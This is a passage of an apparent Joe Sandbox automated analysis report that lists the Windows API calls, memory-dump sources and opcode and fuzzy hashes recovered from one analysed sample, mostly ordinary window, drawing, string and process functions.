                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002D63D7
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002D63E5
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002D63F3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: ec6fe5c4437540fb7d0e8b1ae18bab8c7f2c687d0d4c6d7bfd10a86b1d89306e
                                                          • Instruction ID: c34a4f6122704a44b209d2a424215405bd21119c9752c4e65d6f78ea03e99d03
                                                          • Opcode Fuzzy Hash: ec6fe5c4437540fb7d0e8b1ae18bab8c7f2c687d0d4c6d7bfd10a86b1d89306e
                                                          • Instruction Fuzzy Hash: 2E11E131361514AFDB00AB28DC88FBA77A8EF45720F144159F916CB2D1CBB0AD51CF94
                                                          APIs
                                                            • Part of subcall function 002AF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002AE46F,?,?,?,002AF262,00000000,000000EF,00000119,?,?), ref: 002AF867
                                                            • Part of subcall function 002AF858: lstrcpyW.KERNEL32(00000000,?,?,002AE46F,?,?,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AF88D
                                                            • Part of subcall function 002AF858: lstrcmpiW.KERNEL32(00000000,?,002AE46F,?,?,?,002AF262,00000000,000000EF,00000119,?,?), ref: 002AF8BE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AE488
                                                          • lstrcpyW.KERNEL32(00000000,?,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AE4AE
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AE4E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 953feeb1500b825e8ad38d7fe8d25ab0d23fd252b5a8963dfa0c8a34b7547f62
                                                          • Instruction ID: 7491aaadc695dd687418ede0d6ee94b31529774efb6b19aae578bd9e1a1f6e1a
                                                          • Opcode Fuzzy Hash: 953feeb1500b825e8ad38d7fe8d25ab0d23fd252b5a8963dfa0c8a34b7547f62
                                                          • Instruction Fuzzy Hash: AA11D636110345AFDF259F24EC85D7A77B9FF46350B41402AF809CB290EF719961CBA1
                                                          APIs
                                                          • _free.LIBCMT ref: 00285331
                                                            • Part of subcall function 0027593C: __FF_MSGBANNER.LIBCMT ref: 00275953
                                                            • Part of subcall function 0027593C: __NMSG_WRITE.LIBCMT ref: 0027595A
                                                            • Part of subcall function 0027593C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,?,00000004,?,?,00271003,?), ref: 0027597F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 6df7c948cc197ed271a6a8a88e2284ed731a495849969bc7703d87ad2690179b
                                                          • Instruction ID: c1cdeb2fffb0605c6baaa68b7defb3c21b4a19433c6ec0584a17e9795ac5b3ff
                                                          • Opcode Fuzzy Hash: 6df7c948cc197ed271a6a8a88e2284ed731a495849969bc7703d87ad2690179b
                                                          • Instruction Fuzzy Hash: E8112732536E36EFCB313F70AC4969A37D89F543E0F108465F80C9A1D0CEB489609B80
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002B4385
                                                          • _memset.LIBCMT ref: 002B43A6
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002B43F8
                                                          • CloseHandle.KERNEL32(00000000), ref: 002B4401
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: 2a9a983f67dab174a20641b9aae7e87b796dbde87ca517f8ea891315f4e1d9eb
                                                          • Instruction ID: f1bc84ff5b6141e6d37650fd2db877ab4759804423e99793319453acfb2423ee
                                                          • Opcode Fuzzy Hash: 2a9a983f67dab174a20641b9aae7e87b796dbde87ca517f8ea891315f4e1d9eb
                                                          • Instruction Fuzzy Hash: 3511C8719512287AD7309BA5AC8DFEBBB7CEF44760F14459AF908EB180D2704E808AA4
                                                          APIs
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7E51,?,?,00000000), ref: 00264041
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7E51,?,?,00000000,?,?), ref: 00264065
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 002C6A84
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6A8F
                                                          • _memmove.LIBCMT ref: 002C6ABC
                                                          • inet_ntoa.WSOCK32(?), ref: 002C6AC7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: ecd4553e146fa148fbea11a5e2a989c35a220bce614e6d10db4d57df0192f691
                                                          • Instruction ID: be87bbbd49eeff221f72037fa46746e94ff9aaa2e483a35ae51db07e156608dd
                                                          • Opcode Fuzzy Hash: ecd4553e146fa148fbea11a5e2a989c35a220bce614e6d10db4d57df0192f691
                                                          • Instruction Fuzzy Hash: 7D119372520009AFCB04FFA4DD86DAEB7B8EF04305B144165F906A7262DF70AE64CFA1
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 002516B4
                                                          • GetClientRect.USER32(?,?), ref: 0028B93C
                                                          • GetCursorPos.USER32(?), ref: 0028B946
                                                          • ScreenToClient.USER32(?,?), ref: 0028B951
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: cd5dfb5c72769bef7ce1c99666c50e1d0ac9883001a3045acd3e47de9443d4a6
                                                          • Instruction ID: d667d3d445b617c7fab46140700dc816166ebed4a7b4acae30e62a500f4f6a2d
                                                          • Opcode Fuzzy Hash: cd5dfb5c72769bef7ce1c99666c50e1d0ac9883001a3045acd3e47de9443d4a6
                                                          • Instruction Fuzzy Hash: D2113435A20019ABCB04EF94D899ABE77B8EB04302F540856E901E7140C370AAA68FA9
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 002A9719
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A972B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A9741
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A975C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 2a7bf03ea3073c926a01ea37ecabf447afff6c5f0e555bf403f49342b473ad9a
                                                          • Instruction ID: 2af58787a95c664b854a4725727babe75a1f5e0315504cfb98e1223100f678e6
                                                          • Opcode Fuzzy Hash: 2a7bf03ea3073c926a01ea37ecabf447afff6c5f0e555bf403f49342b473ad9a
                                                          • Instruction Fuzzy Hash: B5114879910218FFEB11DF95CD84E9DFBB8FB49710F204091EA00B7290DA716E61DBA4
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                          • GetStockObject.GDI32(00000011), ref: 00252163
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 3874c0c31c3d4fc6fab458b457a4901bff19f81788ab89bacd6c534884a4c22e
                                                          • Instruction ID: 97857f43c11bda88a4b15d4f4366ab8f80851ee4c408cfb93e5a83d35812ba9d
                                                          • Opcode Fuzzy Hash: 3874c0c31c3d4fc6fab458b457a4901bff19f81788ab89bacd6c534884a4c22e
                                                          • Instruction Fuzzy Hash: 80118B72111A49BFDB024F909C84EEBBB69EF59365F084105FE0856091C771DCA69BA4
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B195E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B1983
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B198D
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B19C0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: 7cd5e1d02e28ad541936213c951d0690212a6d9c2d00c2cc95a14f5633deff41
                                                          • Instruction ID: f310add23c9704a1689c3b342dfb9798fef283e031e0ea7caa9d0c4251e5178f
                                                          • Opcode Fuzzy Hash: 7cd5e1d02e28ad541936213c951d0690212a6d9c2d00c2cc95a14f5633deff41
                                                          • Instruction Fuzzy Hash: FA117031D1095DD7CF009FA4D9A86EEBF78FF09781F404145D944BA240CB7095B08B91
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002DE1EA
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 002DE201
                                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 002DE216
                                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 002DE234
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: fa35c1d7ae7bbf8d4c77adf741d4193d25605141bec609e5e49a9cedbda04ac1
                                                          • Instruction ID: d26f514f46dc6ed603072405d67fe716b68fa427a04dd2256269493fc4b9dc62
                                                          • Opcode Fuzzy Hash: fa35c1d7ae7bbf8d4c77adf741d4193d25605141bec609e5e49a9cedbda04ac1
                                                          • Instruction Fuzzy Hash: FF118EB42513049BEB309F50ED4CF93BBBCEB00B00F10855EAA1ADA280D7B0ED549BA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 1c9f3a8c3a5123a8b22c0ee4713b70643ab6dc44faae1c11cf6c807874de36d4
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: C301893A06A14EBBCF12AE84CC418EE3F22BB19340F688515FE1858175D336C9B1AF91
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 002DB956
                                                          • ScreenToClient.USER32(?,?), ref: 002DB96E
                                                          • ScreenToClient.USER32(?,?), ref: 002DB992
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002DB9AD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 6188db733f553253ded04ff17ffd17ed156c9a08036488633a88eb94561b2dc0
                                                          • Instruction ID: b8413ed0d217c6991e0ddfb30c61448b1363b156026e879976cb4b716a8d2a06
                                                          • Opcode Fuzzy Hash: 6188db733f553253ded04ff17ffd17ed156c9a08036488633a88eb94561b2dc0
                                                          • Instruction Fuzzy Hash: 521144B9D0024AEFDB41CF98D984AEEBBF9FF48310F104156E914E3610D775AA658F50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002DBCB6
                                                          • _memset.LIBCMT ref: 002DBCC5
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00318F20,00318F64), ref: 002DBCF4
                                                          • CloseHandle.KERNEL32 ref: 002DBD06
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: 5da0f684d3c3a36a1d62d3a2019ddc8983e4eb0cdb6e061d7233f961e7b4687f
                                                          • Instruction ID: 3791abedc4aa41926326892604c3fa03e6eab723e232932e1484e5a428455e5c
                                                          • Opcode Fuzzy Hash: 5da0f684d3c3a36a1d62d3a2019ddc8983e4eb0cdb6e061d7233f961e7b4687f
                                                          • Instruction Fuzzy Hash: 6BF05EB2550304BFE2516B61BC89FFB3B5EEB0C750F008421BA08D91A2DB718C5297AD
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 002B71A1
                                                            • Part of subcall function 002B7C7F: _memset.LIBCMT ref: 002B7CB4
                                                          • _memmove.LIBCMT ref: 002B71C4
                                                          • _memset.LIBCMT ref: 002B71D1
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 002B71E1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: f0106218709f17671a4e485858f9d347e31fd9e36541d4712b175b5267fdc1fc
                                                          • Instruction ID: 560c390a6b4dbc4b8acbaa7dc6d651d899154154ffca6511e4f11a69933c67e8
                                                          • Opcode Fuzzy Hash: f0106218709f17671a4e485858f9d347e31fd9e36541d4712b175b5267fdc1fc
                                                          • Instruction Fuzzy Hash: 1FF0D076100104ABCF416F55ECC9A8ABB69EF45360F04C055FE085E25AC771A961DFB5
                                                          APIs
                                                            • Part of subcall function 002516CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00251729
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251738
                                                            • Part of subcall function 002516CF: BeginPath.GDI32(?), ref: 0025174F
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251778
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002DC3E8
                                                          • LineTo.GDI32(00000000,?,?), ref: 002DC3F5
                                                          • EndPath.GDI32(00000000), ref: 002DC405
                                                          • StrokePath.GDI32(00000000), ref: 002DC413
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: d0223ed08d6c4be1ae8dfbe63cb249c4176f15a72358b301c552218514cddd15
                                                          • Instruction ID: 4933fdcb78e2c5958d5d09b9e66fd584da6371a6241487f8ac264041445e3fdf
                                                          • Opcode Fuzzy Hash: d0223ed08d6c4be1ae8dfbe63cb249c4176f15a72358b301c552218514cddd15
                                                          • Instruction Fuzzy Hash: 16F0B43104525AB7DB135F50AC4EFCE3F59AF05311F148000FA11291E1C3B415A5DF99
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002AAA6F
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 002AAA82
                                                          • GetCurrentThreadId.KERNEL32 ref: 002AAA89
                                                          • AttachThreadInput.USER32(00000000), ref: 002AAA90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 4f99c7a39d653a9ce146bcec884d0deffd293462b69e5be606942940700ca854
                                                          • Instruction ID: d81fa90135dc281e9fe63430ef7b6e7be18e09885fe03794076f6e97b2ad824b
                                                          • Opcode Fuzzy Hash: 4f99c7a39d653a9ce146bcec884d0deffd293462b69e5be606942940700ca854
                                                          • Instruction Fuzzy Hash: 39E03931581268BBDB215FA2AD8CFE77F6CEF127A1F008015F50988051CBB185A1CBA0
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 0025260D
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00252617
                                                          • SetBkMode.GDI32(?,00000001), ref: 0025262C
                                                          • GetStockObject.GDI32(00000005), ref: 00252634
                                                          • GetWindowDC.USER32(?,00000000), ref: 0028C1C4
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0028C1D1
